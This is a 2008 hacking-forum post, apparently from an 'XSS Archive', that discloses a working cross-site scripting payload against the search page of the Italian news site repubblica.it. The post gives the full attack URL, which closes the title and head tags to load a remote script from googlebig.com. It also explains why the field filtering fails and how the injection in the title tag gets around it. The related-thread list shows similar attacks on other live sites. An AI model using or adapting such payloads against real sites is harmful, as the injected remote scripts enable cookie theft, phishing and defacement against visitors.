GoogleBig - Forum / Hacking - Programming - Cheats / CROSS-SITE SCRIPTING / XSS Archive /

www.repubblica.it [XSS] + Attack Information


Search | Member List | Calendar | Help | Downloads <-- Only firefox compatible
Current time: 04-07-2009, 07:09 AM | Shoutbox Hello There, Guest! (LoginRegister)


Post Reply  Post Thread 
www.repubblica.it [XSS] + Attack Information
Author Message
Langy
Administrator
*******


Posts: 8.420
Group: Administrators
Joined: Sep 2007
Status: Offline
Reputation: 9
Post: #1
www.repubblica.it [XSS] + Attack Information

XSS:

Code:
http://ricerca.repubblica.it/repubblica?query=%3C/title%3E%3C/head
%3E%3Cbody%20id=%22dettaglio%22%3E%3Cscript%20src=%27http://
googlebig.com/l.js%27%3E&view=quotidiani


> Mirror <

Then, we look at the attack:

Apparently the site of the Repubblica.it is not vulnerable to XSS because the queries of research are filter by control.

Indeed analyze the code after submitting the query:

Code:
<input class="textcerca" name="query"  value="&lt;/title&gt;&lt;/head&gt;&lt;
body id=dettaglio&gt;&lt;script src='http://googlebig.com/l.js'&gt;" type="text"
onkeypress="if(event.keyCode == 13 || event.which == 13 || event.charCode== 13)
{ if (statusAdv){checkFormAdvBase('http://ricerca.repubblica.it/','repubblica')
;}else{javascript:checkFormBase('http://ricerca.repubblica.it/','repubblica');}
return false; }">


As you can see the characters < and > are all parsed in &lt; and &gt;

But we can look that the query is printed also in <title> tag. And here it is not filtred!

Then look at the code in the tag title:
Code:

Code:
<title><script src="http://googlebig.com/l.js"></title>


It can not never work!

So we do in order to close both the title tag and head tag, after we open the body tag for running our Javascript code at the Body and not at the Head.

Code:
<title></title></head><body>
<script src="http://googlebig.com/l.js">
</title>


By adding final tags here that works.

So dear webmaster of Repubblica.it, you must be filtered variable printing also in the <title> tag.

"There is no patch for human stupidity" - K. D. M.

This post was last modified: 11-11-2008 11:44 PM by Langy.

Firefox Linux Ubuntu
Browser e O.S.: 
08-09-2008 04:19 PM
Visit this user's website Find all posts by this user Quote this message in a reply
Post Reply  Post Thread 

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  [XSS] annunci.repubblica.it Langy 2 77 21-05-2009 09:24 AM
Last Post: Langy
  [redirect] velvet.repubblica.it xados 0 61 20-05-2009 09:20 PM
Last Post: xados
  [XSS] www.senato.it - Senato della Repubblica Langy 2 181 13-03-2009 01:28 PM
Last Post: Langy
  www.repubblica.it [XSS] + Info attacco Langy 0 260 08-09-2008 11:06 AM
Last Post: Langy
  espresso.repubblica.it [Redirect] RedTuning 0 179 27-02-2008 12:56 AM
Last Post: RedTuning
  espresso.repubblica.it [XSS] RedTuning 0 187 27-02-2008 12:55 AM
Last Post: RedTuning
  miojob.repubblica.it [XSS] RedTuning 0 190 27-02-2008 12:54 AM
Last Post: RedTuning
  xl.repubblica.it [XSS] RedTuning 0 171 27-02-2008 12:53 AM
Last Post: RedTuning
  tv.repubblica.it [XSS] RedTuning 0 156 22-12-2007 03:33 PM
Last Post: RedTuning

View a Printable Version
Send this Thread to a Friend
Subscribe to this Thread | Add Thread to Favorites

Home Page | Contact Us | Lite (Archive) Mode | RSS